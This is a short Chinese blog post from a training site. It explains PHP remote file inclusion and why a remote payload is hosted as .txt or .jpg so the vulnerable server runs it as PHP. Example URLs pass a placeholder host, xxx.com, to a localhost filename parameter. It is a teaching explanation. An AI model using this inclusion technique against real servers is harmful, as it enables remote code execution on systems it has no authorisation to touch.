当前位置:网站首页>文件包含漏洞问题
文件包含漏洞问题
2022-06-24 19:42:00 【课嗨教育】
某学员在之前提过一个问题,文件包含漏洞是否可以加载php文件,后来我在语雀上对该问题做出解答

在使用文件包含漏洞包含远程文件的时候如:
http://localhost/index.php/?filename=http://xxx.com/phpinfo.php
phpinfo打印出的信息是否为本地信息?
答案:否
我们远程文件包含过来的内容是以php解析呈现出来的,如果直接拉取已执行的php那会直接将结果获取过来,所以哦我们是以其他格式文件形式拉取过来,如:
http://localhost/index.php/?filename=http://xxx.com/phpinfo.txt
http://localhost/index.php/?filename=http://xxx.com/phpinfo.jpg
等格式使其内容被解析为php。换成jsp类型网站同理
边栏推荐
- 【文本数据挖掘】中文命名实体识别:HMM模型+BiLSTM_CRF模型(Pytorch)【调研与实验分析】
- Main cause of EMI - mold current
- laravel 验证器的使用
- Dig deep into MySQL - resolve the clustered index / secondary index / federated index of InnoDB storage engine
- C#学习两年的增删改查和C#导入导出(去重)案例
- Pousser l'information au format markdown vers le robot nail
- 研究生宿舍大盘点!令人羡慕的研究生宿舍来了!
- Financial management [2]
- Laravel add helper file
- 剑指 Offer 13. 机器人的运动范围
猜你喜欢

The large-scale market of graduate dormitory! Here comes the enviable graduate dormitory!

关于某手滑块的一些更新(6-18,js逆向)

Push markdown format information to the nailing robot

canvas 实现图片新增水印

推送Markdown格式信息到钉钉机器人

01_SpingBoot 框架入门

花房集团二次IPO:成于花椒,困于花椒

非单文件组件

Non single file component

Recommended course: workplace writing training
随机推荐
「ARM 架构」是一种怎样的处理器架构?
【nvm】
Dig deep into MySQL - resolve the difference between clustered and non clustered indexes
07_SpingBoot 实现 RESTful 风格
Laravel scheduled task
Selection (027) - what is the output of the following code?
How should we measure agile R & D projects?
Financial management [5]
laravel 创建 service层
Research Report on terahertz imaging system industry - market status analysis and development prospect forecast
Servlet
03_SpingBoot 核心配置文件
How to submit the shopee opening and settlement flow?
研究生宿舍大盘点!令人羡慕的研究生宿舍来了!
Selection (026) - what is the output of the following code?
23研考生注意啦!备考期间最容易中招的骗局,居然是它们?!
Research Report on market supply and demand and strategy of China's solar charging controller industry
Building Survey [1]
Blogs personal blog project details (servlet implementation)
laravel 验证器的使用